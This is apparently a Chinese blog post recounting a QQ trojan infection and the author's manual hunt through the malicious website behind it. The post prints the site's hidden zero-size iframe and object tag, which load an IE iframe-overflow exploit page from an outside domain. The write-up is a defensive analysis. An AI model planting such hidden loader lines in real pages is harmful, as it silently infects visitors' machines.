昨天办公室里刚帮别人装好的一台机器被同事玩qq染上了病毒,他无意中点击了别人给他发来信息里的网址,说可以免费得qq币,以前看到过此类qq病毒,但一直没有机会接触,于是就找杀毒软件杀,下了金山的qq病毒专杀工具,查到内存里有Win32.Troj.QQMydj2005dl.125440,但是杀一下,屏幕马上又重新启动了一下shell(也就是explorer),再运行qq还是一样,病毒依旧。
呵呵,看来内存里的进程没清掉,文件扫描并没发现有病毒.于是想先把ie打补丁,但补丁却提示我的ie6不是ie6,补丁也打不上,于是我想就看看到底这个网站作了什么手脚.
"我不下地狱谁下地狱"想起了佛祖为了拯救世人而所做的,我做了一个愚蠢而鲁莽的决定:(决定用我的机器染一次病毒,但我却范了一个严重的错误,忘记了备份注册表(以后要考虑周全再行事,各位千万不要学我啊)后果可想而知,我的qq也一样,只要一点用户聊天,病毒自己就会定时的粘贴一些垃圾和网址到发送对话框中,并自动发送。如此开始了我的手动清除之旅,我用一个httpdebug调试器,开始连接调试qq上发过来的那个网站,然后察看它网页的源代码又上网查找相关的漏洞,原来是ie的iframe漏洞,它可以嵌入别的网页,但存在着缓冲区漏洞,如果恶意网页构造特定的内容就可以让未补丁的ie客户机执行任意指令。发现问题在这里
〈Iframe src="http://www.joyiex.com/dq.htm" width="0" height="0" scrolling="no"
frameborder="0"〉〈/iframe〉
〈noscript〉〈iframe src=*〉〈/iframe〉〈/noscript〉
又开始连接dq.htm,结果又得到
<HTML>
<object data="dq.asp">
</HTML>
关注此文的读者还看过: